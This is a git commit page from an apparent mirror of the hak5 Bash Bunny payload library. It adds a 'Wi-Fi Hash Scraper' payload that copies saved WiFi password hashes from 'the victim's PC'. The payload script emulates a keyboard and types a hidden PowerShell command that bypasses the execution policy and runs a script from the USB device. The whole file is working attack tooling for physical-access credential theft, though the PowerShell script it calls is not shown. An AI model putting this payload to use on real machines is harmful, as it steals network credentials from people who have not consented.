mirror of
https://github.com/hak5/bashbunny-payloads.git
synced 2025-10-29 16:58:25 +00:00
Create payload.txt
This commit is contained in:
parent
2266a9ddf6
commit
b0ebf99aad
22
payloads/library/recon/WiFi-Hash-Scraper/payload.txt
Normal file
22
payloads/library/recon/WiFi-Hash-Scraper/payload.txt
Normal file
@ -0,0 +1,22 @@
|
||||
#!/bin/bash
|
||||
#
|
||||
# Title: Wi-Fi Hash Scraper
|
||||
#
|
||||
# Description:
|
||||
# Copies all of the known / saved WiFi password hashes from the victim's PC to the BashBunny's loot folder.
|
||||
#
|
||||
# Author: KryptoKola
|
||||
# Version: 1.0
|
||||
# Category: Recon
|
||||
# Target: Microsoft Windows 10 & 11
|
||||
|
||||
ATTACKMODE HID STORAGE
|
||||
|
||||
LED SETUP
|
||||
GET SWITCH_POSITION
|
||||
LED ATTACK
|
||||
RUN WIN "powershell -Noni -NoP -W h -EP Bypass iex((Get-Volume -FileSystemLabel 'BashBunny').DriveLetter+':\payloads\\$SWITCH_POSITION\Get-Hashes.ps1')"
|
||||
Q DELAY 250
|
||||
Q ENTER
|
||||
Q DELAY 3000
|
||||
LED FINISH
|
||||
Loading…
x
Reference in New Issue
Block a user